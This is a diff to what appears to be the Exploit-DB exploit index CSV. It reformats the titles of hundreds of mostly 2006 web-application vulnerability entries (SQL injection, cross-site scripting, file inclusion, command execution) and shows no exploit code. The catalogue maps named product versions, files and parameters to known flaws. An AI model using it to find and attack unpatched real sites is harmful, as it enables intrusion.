-27172,platforms/php/webapps/27172.txt,"SPIP 1.8.2 - Spip_RSS.php Remote Command Execution",2006-02-08,rgod,php,webapps,0 +27172,platforms/php/webapps/27172.txt,"SPIP 1.8.2 - 'Spip_RSS.php' Remote Command Execution",2006-02-08,rgod,php,webapps,0 27173,platforms/php/webapps/27173.txt,"CPAINT 1.3/2.0 - 'TYPE.php' Cross-Site Scripting",2006-02-08,"James Bercegay",php,webapps,0 27174,platforms/asp/webapps/27174.txt,"GA's Forum Light - 'Archive.asp' SQL Injection",2006-02-07,Dj_Eyes,asp,webapps,0 27175,platforms/php/webapps/27175.php,"PwsPHP 1.2.3 - SQL Injection",2006-02-09,papipsycho,php,webapps,0 27176,platforms/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps,0 27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU - Cross-Site Request Forgery/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 - showtopic SQL Injection",2006-03-06,Mr.SNAKE,php,webapps,0 -27183,platforms/php/webapps/27183.txt,"Farsinews 2.1/2.5 - 'show_archives.php' template Parameter Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 +27183,platforms/php/webapps/27183.txt,"Farsinews 2.1/2.5 - 'show_archives.php?template' Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - 'addressbook.update.php?contactgroupid' Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - 'folders.update.php?folderid' Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 27186,platforms/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 - 'index.php' $_SERVER['PHP_SELF'] Cross-Site Scripting",2006-02-11,"GulfTech Security",php,webapps,0 @@ -29633,14 +29634,14 @@ id,file,description,date,author,platform,type,port 27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - 'install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0 27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0 27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0 -27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0 +27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - 'dir.php' Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0 27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - 'readfolder.php?path' Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 -27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php' bgcol Parameter Cross-Site Scripting",2006-02-11,zjieb,php,webapps,0 -27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - upload.php Unrestricted Arbitrary File Upload",2006-02-11,zjieb,php,webapps,0 +27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php?bgcol' Cross-Site Scripting",2006-02-11,zjieb,php,webapps,0 +27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - 'upload.php' Unrestricted Arbitrary File Upload",2006-02-11,zjieb,php,webapps,0 27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - 'search.php?Q' Cross-Site Scripting",2006-02-12,Kiki,php,webapps,0 27202,platforms/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",php,webapps,0 27204,platforms/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 -27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php check_login()' Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 +27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php?check_login()' Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - 'u2u.php?Username' Cross-Site Scripting",2006-02-13,"James Bercegay",php,webapps,0 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0 27208,platforms/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - 'header.php?Pagetitle' Cross-Site Scripting",2006-02-13,"Janek Vind",php,webapps,0 @@ -29674,11 +29675,11 @@ id,file,description,date,author,platform,type,port 27247,platforms/php/webapps/27247.txt,"E107 Website System 0.7.2 Chatbox Plugin - HTML Injection",2006-02-18,"marc & shb",php,webapps,0 27248,platforms/php/webapps/27248.txt,"Webpagecity WPC easy - SQL Injection",2006-02-18,murfie,php,webapps,0 27249,platforms/php/webapps/27249.html,"PHP-Nuke 7.x - CAPTCHA Bypass",2006-02-18,waraxe,php,webapps,0 -27250,platforms/php/webapps/27250.txt,"TTS Software Time Tracking Software 3.0 - edituser.php Access Validation",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 +27250,platforms/php/webapps/27250.txt,"TTS Software Time Tracking Software 3.0 - 'edituser.php' Access Validation",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 27251,platforms/php/webapps/27251.txt,"Magic Calendar Lite 1.02 - 'index.php' SQL Injection",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 27252,platforms/php/webapps/27252.txt,"CuteNews 1.4.1 - 'show_news.php' Cross-Site Scripting",2006-02-20,imei,php,webapps,0 -27254,platforms/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter Cross-Site Scripting",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 -27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 +27254,platforms/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module - 'language' Cross-Site Scripting",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 +27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module - 'language' SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0 27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection",2006-02-22,trueend5,php,webapps,0 @@ -29689,8 +29690,8 @@ id,file,description,date,author,platform,type,port 27265,platforms/php/webapps/27265.txt,"Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps,0 27266,platforms/php/webapps/27266.txt,"Dragonfly CMS 9.0.6.1 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps,0 27267,platforms/php/webapps/27267.txt,"Dragonfly CMS 9.0.6.1 Surveys Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps,0 -27268,platforms/php/webapps/27268.txt,"Dragonfly CMS 9.0.6.1 Downloads Module - c Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 -27269,platforms/php/webapps/27269.txt,"Dragonfly CMS 9.0.6.1 Coppermine Module - album Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 +27268,platforms/php/webapps/27268.txt,"Dragonfly CMS 9.0.6.1 Downloads Module - 'c' Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 +27269,platforms/php/webapps/27269.txt,"Dragonfly CMS 9.0.6.1 Coppermine Module - 'album' Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 27494,platforms/php/webapps/27494.txt,"phpMyFamily 1.4.1 - 'Track.php' Cross-Site Scripting",2006-03-28,matrix_killer,php,webapps,0 27495,platforms/php/webapps/27495.txt,"PHPCOIN 1.2 - 'mod_print.php?fs' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27496,platforms/php/webapps/27496.txt,"PHPCOIN 1.2 - 'mod.php?fs' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 @@ -29720,14 +29721,14 @@ id,file,description,date,author,platform,type,port 27307,platforms/php/webapps/27307.txt,"JGS-Gallery 4.0 - 'Board jgs_galerie_scroll.php?userid' Cross-Site Scripting",2006-02-23,nuker,php,webapps,0 27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 27309,platforms/php/webapps/27309.txt,"myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 -27310,platforms/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 - Failure.asp Cross-Site Scripting",2006-02-25,rUnViRuS,asp,webapps,0 +27310,platforms/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 - 'Failure.asp' Cross-Site Scripting",2006-02-25,rUnViRuS,asp,webapps,0 27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion",2006-02-25,"NSA Group",php,webapps,0 27312,platforms/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload",2006-02-25,"NSA Group",php,webapps,0 27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 - 'basket.php' Multiple SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0 27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - 'Mainfile.php' SQL Injection",2006-02-25,waraxe,php,webapps,0 -27320,platforms/hardware/webapps/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,webapps,0 +27320,platforms/hardware/webapps/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page 'name' Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,webapps,0 27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps,0 27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - 'galerie_index.php?Username' Cross-Site Scripting",2006-02-27,botan,php,webapps,0 27323,platforms/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - 'galerie_onfly.php' Cross-Site Scripting",2006-02-27,botan,php,webapps,0 @@ -29745,10 +29746,10 @@ id,file,description,date,author,platform,type,port 27340,platforms/php/webapps/27340.txt,"SMBlog 1.2 - Arbitrary PHP Command Execution",2006-03-01,botan,php,webapps,0 27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 - 'Poems.php' SQL Injection",2006-03-02,sherba,php,webapps,0 27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 - 'forgotten_password.php' SQL Injection",2006-03-02,"Hamid Ebadi",php,webapps,0 -27343,platforms/php/webapps/27343.txt,"vBulletin 3.0/3.5 - 'profile.php Email' HTML Injection",2006-03-02,imei,php,webapps,0 +27343,platforms/php/webapps/27343.txt,"vBulletin 3.0/3.5 - 'profile.php?Email' HTML Injection",2006-03-02,imei,php,webapps,0 27344,platforms/php/webapps/27344.txt,"NZ eCommerce System - 'index.php' Multiple SQL Injections",2006-03-02,r0t,php,webapps,0 27345,platforms/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Inclusion",2006-03-02,botan,php,webapps,0 -27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 - show.php MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps,0 +27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 - 'show.php' MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps,0 27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 - 'comment.php?UserID' Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0 27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 - 'contact.php?UserID' Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -29759,7 +29760,7 @@ id,file,description,date,author,platform,type,port 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0 27367,platforms/php/webapps/27367.txt,"Link Bank - 'Iframe.php' Cross-Site Scripting",2006-03-07,Retard,php,webapps,0 27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - 'podcast.php' SQL Injection",2006-03-07,tzitaroth,php,webapps,0 -27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php' template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 +27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php?template' Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - 'deleteuser.php?user' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - 'viewuser.php?hits' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 @@ -29797,7 +29798,7 @@ id,file,description,date,author,platform,type,port 27411,platforms/php/webapps/27411.txt,"QwikiWiki 1.4/1.5 - 'pageindex.php?help' Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 27412,platforms/php/webapps/27412.txt,"QwikiWiki 1.4/1.5 - 'recentchanges.php?help' Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 27413,platforms/php/webapps/27413.txt,"Core News 2.0.1 - 'index.php' Remote Code Execution",2006-03-10,botan,php,webapps,0 -27414,platforms/php/webapps/27414.txt,"vCard 2.8/2.9 - create.php Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Linux_Drox,php,webapps,0 +27414,platforms/php/webapps/27414.txt,"vCard 2.8/2.9 - 'create.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Linux_Drox,php,webapps,0 27415,platforms/php/webapps/27415.txt,"WMNews - 'wmview.php?ArtCat' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 27416,platforms/php/webapps/27416.txt,"WMNews - 'footer.php?ctrrowcol' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 27417,platforms/php/webapps/27417.txt,"WMNews - 'wmcomments.php?ArtID' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 @@ -29820,9 +29821,9 @@ id,file,description,date,author,platform,type,port 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0 27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - 'Haydn.exe' Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0 27454,platforms/php/webapps/27454.txt,"Motorola - BlueTooth Interface Dialog Spoofing",2006-03-22,kspecial,php,webapps,0 -27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 +27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - 'viewEvent.cfm?EventID' SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 - '/news/newsView.cfm?NewsID' SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 -27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 - mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 +27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 - 'mainCal.cfm' SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 - 'Img.php' Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 - 'Img.php' Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 - 'ViewStatement.php' SQL Injection",2003-03-23,r0t,php,webapps,0 @@ -29840,18 +29841,18 @@ id,file,description,date,author,platform,type,port 27475,platforms/php/webapps/27475.txt,"SaPHPLesson 2.0 - 'print.php' SQL Injection",2006-03-27,Linux_Drox,php,webapps,0 27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - 'print.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 - 'mail.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 -27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 - Toast.asp Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 +27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 - 'Toast.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 27480,platforms/asp/webapps/27480.txt,"Online Quiz System - 'prequiz.asp?exam' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27481,platforms/asp/webapps/27481.txt,"Online Quiz System - 'student.asp?msg' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27482,platforms/asp/webapps/27482.txt,"Caloris Planitia Technologies School Management System 1.0 - Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27483,platforms/php/webapps/27483.txt,"Pixel Motion - '/admin/index.php' Multiple SQL Injections",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 -27484,platforms/php/webapps/27484.txt,"Pixel Motion - 'index.php' date Parameter SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 +27484,platforms/php/webapps/27484.txt,"Pixel Motion - 'index.php?date' SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 - 'index.php' Multiple SQL Injections",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27486,platforms/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'domains.asp?txtDomainName' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27487,platforms/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 27488,platforms/cgi/webapps/27488.txt,"BlankOL 1.0 - Bol.cgi Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,cgi,webapps,0 27489,platforms/cfm/webapps/27489.txt,"FusionZONE CouponZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,cfm,webapps,0 -27490,platforms/cfm/webapps/27490.txt,"ClassifiedZONE 1.2 - Accountlogon.cfm Cross-Site Scripting",2006-03-28,r0t,cfm,webapps,0 +27490,platforms/cfm/webapps/27490.txt,"ClassifiedZONE 1.2 - 'Accountlogon.cfm' Cross-Site Scripting",2006-03-28,r0t,cfm,webapps,0 27491,platforms/cfm/webapps/27491.txt,"FusionZONE CouponZONE 4.2 - Multiple SQL Injections",2006-03-27,r0t,cfm,webapps,0 27492,platforms/php/webapps/27492.txt,"ActiveCampaign SupportTrio 2.50.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,php,webapps,0 27493,platforms/cfm/webapps/27493.txt,"RealestateZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,cfm,webapps,0 @@ -29863,8 +29864,8 @@ id,file,description,date,author,platform,type,port 27502,platforms/php/webapps/27502.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewDay.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,php,webapps,0 27503,platforms/php/webapps/27503.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewSearch.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,php,webapps,0 27504,platforms/php/webapps/27504.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewYear.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,php,webapps,0 -27505,platforms/php/webapps/27505.txt,"Connect Daily 3.2.8/3.2.9 - ViewCal.html item_type_id Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 -27506,platforms/php/webapps/27506.txt,"Connect Daily 3.2.8/3.2.9 - ViewWeek.html week Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 +27505,platforms/php/webapps/27505.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewCal.html?item_type_id' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 +27506,platforms/php/webapps/27506.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewWeek.html?week' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27507,platforms/php/webapps/27507.txt,"AL-Caricatier 2.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,Linux_Drox,php,webapps,0 27509,platforms/php/webapps/27509.txt,"OneOrZero 1.6.3 Helpdesk - 'index.php' SQL Injection",2006-03-28,Preddy,php,webapps,0 27510,platforms/php/webapps/27510.txt,"PhxContacts 0.93 - 'carnet.php' Multiple SQL Injections",2006-03-29,"Morocco Security Team",php,webapps,0 @@ -29885,7 +29886,7 @@ id,file,description,date,author,platform,type,port 27532,platforms/php/webapps/27532.txt,"Joomla! Component redSHOP 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery - 'index.php' Remote File Inclusion",2006-03-30,"Morocco Security Team",php,webapps,0 27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 - 'post.php' SQL Injection",2006-03-30,"Morocco Security Team",php,webapps,0 -27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - searchresults.asp Cross-Site Scripting",2006-03-31,r0t,asp,webapps,0 +27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - 'searchresults.asp' Cross-Site Scripting",2006-03-31,r0t,asp,webapps,0 27537,platforms/php/webapps/27537.txt,"Warcraft III Replay Parser for PHP 1.8.c - 'index.php' Remote File Inclusion",2006-03-31,botan,php,webapps,0 27538,platforms/php/webapps/27538.txt,"RedCMS 0.1 - 'profile.php?u' SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27539,platforms/php/webapps/27539.txt,"RedCMS 0.1 - 'login.php' Multiple SQL Injections",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -29893,22 +29894,22 @@ id,file,description,date,author,platform,type,port 27544,platforms/php/webapps/27544.txt,"SoftBiz Image Gallery - 'suggest_image.php?cid' SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27545,platforms/php/webapps/27545.txt,"SoftBiz Image Gallery - 'insert_rating.php?img_id' SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27546,platforms/php/webapps/27546.txt,"SoftBiz Image Gallery - 'images.php?cid' SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27548,platforms/php/webapps/27548.txt,"Claroline 1.x - rqmkhtml.php Information Disclosure",2006-03-31,rgod,php,webapps,0 +27548,platforms/php/webapps/27548.txt,"Claroline 1.x - 'rqmkhtml.php' Information Disclosure",2006-03-31,rgod,php,webapps,0 27549,platforms/php/webapps/27549.txt,"Claroline 1.x - 'rqmkhtml.php' Cross-Site Scripting",2006-03-31,rgod,php,webapps,0 27550,platforms/php/webapps/27550.txt,"Blank'N'Berg 0.2 - Directory Traversal",2006-03-31,"Amine ABOUD",php,webapps,0 27551,platforms/php/webapps/27551.txt,"Blank'N'Berg 0.2 - Cross-Site Scripting",2006-03-31,"Amine ABOUD",php,webapps,0 -27552,platforms/asp/webapps/27552.txt,"ISP Site Man - admin_login.asp SQL Injection",2006-04-01,s3rv3r_hack3r,asp,webapps,0 -27558,platforms/jsp/webapps/27558.txt,"Bugzero 4.3.1 - query.jsp msg Parameter Cross-Site Scripting",2006-04-03,r0t,jsp,webapps,0 +27552,platforms/asp/webapps/27552.txt,"ISP Site Man - 'admin_login.asp' SQL Injection",2006-04-01,s3rv3r_hack3r,asp,webapps,0 +27558,platforms/jsp/webapps/27558.txt,"Bugzero 4.3.1 - 'query.jsp?msg' Cross-Site Scripting",2006-04-03,r0t,jsp,webapps,0 27559,platforms/jsp/webapps/27559.txt,"Bugzero 4.3.1 - 'edit.jsp' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,r0t,jsp,webapps,0 -27560,platforms/php/webapps/27560.txt,"aWebNews 1.2 - 'visview.php' _GET['cid'] Parameter SQL Injection",2006-04-03,"Aliaksandr Hartsuyeu",php,webapps,0 +27560,platforms/php/webapps/27560.txt,"aWebNews 1.2 - 'visview.php?_GET['cid']' SQL Injection",2006-04-03,"Aliaksandr Hartsuyeu",php,webapps,0 27561,platforms/cgi/webapps/27561.txt,"Web-APP.net WebAPP 0.9.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,r0t,cgi,webapps,0 -27562,platforms/cgi/webapps/27562.txt,"Web-APP.net WebAPP 0.9.x - mods/calendar/index.cgi vsSD Parameter Cross-Site Scripting",2006-04-03,r0t,cgi,webapps,0 +27562,platforms/cgi/webapps/27562.txt,"Web-APP.net WebAPP 0.9.x - /mods/calendar/index.cgi?vsSD' Cross-Site Scripting",2006-04-03,r0t,cgi,webapps,0 27563,platforms/php/webapps/27563.txt,"LucidCMS 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,"Rusydi Hasan",php,webapps,0 27567,platforms/php/webapps/27567.txt,"ArabPortal 2.0.1 - Multiple Input Validation Vulnerabilities",2006-04-04,o.y.6,php,webapps,0 27570,platforms/php/webapps/27570.txt,"Chucky A. Ivey N.T. 1.1 - 'index.php' Multiple HTML Injection Vulnerabilities",2006-04-05,"Aliaksandr Hartsuyeu",php,webapps,0 -27571,platforms/php/webapps/27571.txt,"SKForum 1.x - area.View.action areaID Parameter Cross-Site Scripting",2006-04-06,r0t,php,webapps,0 -27572,platforms/php/webapps/27572.txt,"SKForum 1.x - planning.View.action time Parameter Cross-Site Scripting",2006-04-06,r0t,php,webapps,0 -27573,platforms/php/webapps/27573.txt,"SKForum 1.x - user.View.action userID Parameter Cross-Site Scripting",2006-04-06,r0t,php,webapps,0 +27571,platforms/php/webapps/27571.txt,"SKForum 1.x - 'area.View.action?areaID' Cross-Site Scripting",2006-04-06,r0t,php,webapps,0 +27572,platforms/php/webapps/27572.txt,"SKForum 1.x - 'planning.View.action?time' Cross-Site Scripting",2006-04-06,r0t,php,webapps,0 +27573,platforms/php/webapps/27573.txt,"SKForum 1.x - 'user.View.action?userID' Cross-Site Scripting",2006-04-06,r0t,php,webapps,0 27574,platforms/php/webapps/27574.txt,"Basic Analysis and Security Engine (BASE) 1.2.4 - PrintFreshPage Cross-Site Scripting",2003-04-06,"Adam Ely",php,webapps,0 27575,platforms/php/webapps/27575.txt,"MD News 1 - 'admin.php' SQL Injection",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps,0 27576,platforms/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 - 'PNuserapi.php' SQL Injection",2006-04-06,king_purba,php,webapps,0 @@ -29916,17 +29917,17 @@ id,file,description,date,author,platform,type,port 27579,platforms/php/webapps/27579.txt,"Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-07,KaDaL-X,php,webapps,0 27580,platforms/php/webapps/27580.txt,"vBulletin 3.5.1 - 'Vbugs.php' Cross-Site Scripting",2006-04-07,r0t,php,webapps,0 27582,platforms/php/webapps/27582.txt,"AWeb's Banner Generator 3.0 - Cross-Site Scripting",2006-04-07,benozor77,php,webapps,0 -27583,platforms/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 - Deptname Parameter Cross-Site Scripting",2006-04-07,r0t,cgi,webapps,0 +27583,platforms/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 - 'Deptname' Cross-Site Scripting",2006-04-07,r0t,cgi,webapps,0 27584,platforms/php/webapps/27584.txt,"JBook 1.3 - 'index.php' Cross-Site 